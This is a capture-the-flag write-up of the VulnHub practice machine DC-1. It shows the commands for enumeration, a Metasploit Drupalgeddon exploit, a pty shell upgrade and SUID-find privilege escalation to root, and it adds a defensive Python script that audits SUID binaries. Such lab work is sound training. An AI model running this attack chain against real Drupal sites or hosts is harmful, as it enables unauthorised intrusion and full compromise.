Overview
DC-1 is a beginner VulnHub machine focused on basic enumeration, exploiting an old Drupal installation, getting a shell, and escalating privileges through a misconfigured SUID binary.
The attack path was:
Drupal 7 -> Drupalgeddon -> reverse shell -> SUID find -> root
Enumeration
I started by finding the target on the local network.
Network discovery: sudo netdiscover -r 192.168.X.0/24
After finding the IP, I scanned the machine with Nmap.
Nmap scan: nmap -sC -sV -oN nmap.txt <TARGET_IP>
The useful Nmap findings were:
| Port | Component | Version / Finding |
|---|---|---|
| 80/tcp | HTTP server | Apache 2.2.22 |
| 80/tcp | PHP | PHP 5.4.45 |
| 80/tcp | CMS | Drupal 7 |
Since the web server was running Drupal 7, I focused on the website first.
I confirmed the website technology with WhatWeb:
whatweb http://<TARGET_IP>
I also checked exposed Drupal files:
curl http://<TARGET_IP>/CHANGELOG.txt
This helped confirm that the Drupal version was outdated.
Exploitation
After confirming Drupal 7, I searched for known exploits.
SearchSploit: searchsploit drupal 7
The important vulnerability was SA-CORE-2014-005, also known as Drupalgeddon.
I used Metasploit to exploit it:
| Step | Command |
|---|---|
| Start Metasploit | msfconsole |
| Search for the module | search drupalgeddon |
| Select the exploit | use exploit/multi/http/drupal_drupageddon |
| Set the target | set RHOSTS <TARGET_IP> |
| Set the site path | set TARGETURI / |
| Run the exploit | run |
This gave me a shell as the web server user.
Shell Upgrade
The first shell was basic, so I upgraded it.
TTY upgrade: python -c 'import pty; pty.spawn("/bin/bash")'
Set terminal: export TERM=xterm
Then I checked my user and the system information:
whoami
id
uname -a
Privilege Escalation
After getting a shell, I started local enumeration.
I looked for SUID binaries:
find / -perm -4000 -type f 2>/dev/null
The interesting result was:
/usr/bin/find
Since find had SUID permissions, I used it to spawn a root shell:
find . -exec /bin/bash -p \; -quit
Then I confirmed root:
whoami
id
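The SUID find misconfiguration above is easy to catch on the defending side by diffing the host's setuid binaries against a known-good baseline. The following is an added audit example, not code from the original writeup; the baseline set and the sample entries are constructed for illustration, and a real baseline would be taken from a clean install of the same distribution.

```python
import os
import stat

# Assumed baseline of SUID binaries expected on this host (constructed for
# illustration; take a real baseline from a clean install of the same distro).
BASELINE_SUID = {
    "/bin/su",
    "/bin/mount",
    "/bin/umount",
    "/usr/bin/passwd",
    "/usr/bin/sudo",
}

def is_suid(mode):
    """True if the mode bits carry setuid (the same bit `find -perm -4000` matches)."""
    return bool(mode & stat.S_ISUID)

def audit_suid(entries, baseline=BASELINE_SUID):
    """Return the SUID regular files in `entries` that are not in the baseline.

    `entries` is an iterable of (path, mode) pairs, so the logic can be run
    against constructed data as well as a real filesystem walk.
    """
    unexpected = []
    for path, mode in entries:
        if stat.S_ISREG(mode) and is_suid(mode) and path not in baseline:
            unexpected.append(path)
    return sorted(unexpected)

def walk_filesystem(root="/"):
    """Yield (path, mode) for every file under root, skipping unreadable entries."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue

# Constructed sample resembling the DC-1 box: find carries the setuid bit.
SAMPLE_ENTRIES = [
    ("/bin/su", 0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/find", 0o104755),    # the misconfiguration the writeup abused
    ("/usr/bin/python", 0o100755),  # normal binary, no setuid bit
    ("/etc", 0o040755),             # directory, ignored by the audit
]

if __name__ == "__main__":
    for path in audit_suid(SAMPLE_ENTRIES):  # swap in walk_filesystem() on a live host
        print("unexpected SUID binary:", path)
```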
Final Flag
After getting root, I moved to the root directory and read the final flag.
Go to root folder: cd /root
Read final flag: cat thefinalflag.txt
What I Learned
DC-1 was simple, but it was useful because it connected the full attack path together.
The main idea was to enumerate properly, identify the outdated Drupal version, exploit it, then keep enumerating locally until a privilege escalation path turned up.
The biggest lesson is that outdated CMS software can quickly lead to full compromise, especially when the system also has weak local permissions such as a SUID find binary.